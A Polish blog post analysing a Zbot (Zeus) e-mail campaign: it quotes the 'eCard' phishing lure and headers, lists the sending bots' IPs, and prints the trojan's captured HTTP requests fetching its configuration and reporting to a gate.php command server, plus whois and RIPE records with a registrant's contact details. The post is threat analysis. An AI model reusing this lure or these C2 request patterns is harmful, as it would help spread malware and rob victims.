Ten sam temat, ten sam trojan w środku, jedna i ta sama binarka, dokładnie ta sama treść e-maila. Prosto, zwięźle i na temat. W ilości bardzo konkretnej i to jest najważniejsze. Dawno nie widziałem tak ostro napierającej kampanii. Temat wiadomości: You have received an eCard. Zwykły ecard.zip, a w załączniku ecard.exe. Przez 24 godziny akcji promocyjnej otrzymałem na swoje kilka kont pocztowych łącznie 132 wiadomości!!! I wciąż przychodzą nowe :] Ktoś mocno testuje atak na całego :] Wczoraj po pojawieniu się pierwszych kilkunastu wiadomości w przeciągu godziny, wrzuciłem plik do serwisu VirusTotal i jedynie 14 z 41 silników antywirusowych skutecznie oceniło zagrożenie. Sandbox firmy Sunbelt aktualnie pracuje nad raportem wynikowym tego pliku. Treść wiadomości e-mail jest cały czas taka sama:
Good day.
You have received an eCardTo pick up your eCard, open attached file
Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!We hope you enjoy you eCard.
Thank You!
Nagłówki, które pozostają niezmienne to:
Subject: You have received an eCard
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Wziąłem na warsztat pierwsze kilkanaście sztuk przysłanej wiadomości i oto źródłowe adresy IP wraz z godzinami połączenia:
21:58:14 – 114.206.5.102 ()
22:26:22 – 173.23.186.173 (173-23-186-173.client.mchsi.com)
22:31:19 – 201.51.211.201 (20151211201.user.veloxzone.com.br)
22:35:44 – 189.72.108.81 (189-72-108-81.e.bnut3703.brasiltelecom.net.br)
22:42:04 – 78.107.5.63 ()
22:44:11 – 84.217.63.41 (84-217-63-41.tn.glocalnet.net)
23:06:03 – 190.78.87.218 (190-78-87-218.dyn.dsl.cantv.net.)
23:20:54 – 201.92.140.211 (201-92-140-211.dsl.telesp.net.br.)
23:24:56 – 189.35.61.240 (bd233df0.virtua.com.br.)
23:30:17 – 68.238.241.21 (pool-68-238-241-21.phlapa.fios.verizon.net.)
23:57:08 – 208.51.233.194 ()
Dla zainteresowanych wyniki z bazy GeoIP firmy Maxmind:
Czyli standardowo boty z całego świata z pełnym zaangażowaniem wciskają ludziom ich ulubione złośliwe oprogramowanie. Ciekawym czy będzie ta cała akcja miała jakiś sensowny impakt na całość działalności tego typu :]
Po uruchomieniu pliku Zbot bo tak nazywa się to złośliwe oprogramowanie, próbuję połączyć się z domeną pinesk com aby pobrać plik z danymi konfiguracyjnymi dla bota z:
GET /pinec/pinesk.ord HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: pinesk com
Pragma: no-cache
aby następnie zgłosić się do centrali:
POST /pine/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: pinesk com
Content-Length: 268
Connection: Keep-Alive
Pragma: no-cache
Przy okazji wyłączając zaporę systemu Windows.
Jak widzę w projekcie Zeus Tracker już odnotowali obecność tej centralki botów.
I trochę domenowo, adresowych szczegółów:
pinesk com has address 91.213.72.13
Domain Name: PINESK COM
Registrar: DOMAINCONTEXT, INC.
Whois Server: whois.domaincontext.com
Referral URL: http://www.domaincontext.com
Name Server: DNS1.WEBDRIVE.RU
Name Server: DNS2.WEBDRIVE.RU
Status: clientTransferProhibited
Updated Date: 23-jul-2009
Creation Date: 23-jul-2009
Expiration Date: 23-jul-2010
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
inetnum: 91.213.72.0 – 91.213.72.255
netname: ZHM-NET
descr: PE Zavalnuk Vladislav Mihailovich
country: UA
org: ORG-PVMZ1-RIPE
admin-c: VMZ4-RIPE
tech-c: VMZ4-RIPE
status: ASSIGNED PI
mnt-by: ZHM-MNT
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-routes: ZHM-MNT
mnt-domains: ZHM-MNT
source: RIPE # Filtered
organisation: ORG-PVMZ1-RIPE
org-name: PE Vladislav Mihailovich Zavalnuk
org-type: OTHER
descr: PE Vladislav Mihailovich Zavalnuk
address: 28 Abaya street,
address: Astana, Kazakhstan
phone: +7 700 3468723
e-mail: vzavalnuk@mail.kz
admin-c: VMZ4-RIPE
tech-c: VMZ4-RIPE
mnt-ref: ZHM-MNT
mnt-by: ZHM-MNT
source: RIPE # Filtered
route: 91.213.72.0/24
descr: ZHM network
origin: AS49637
mnt-by: ZHM-MNT
source: RIPE # Filtered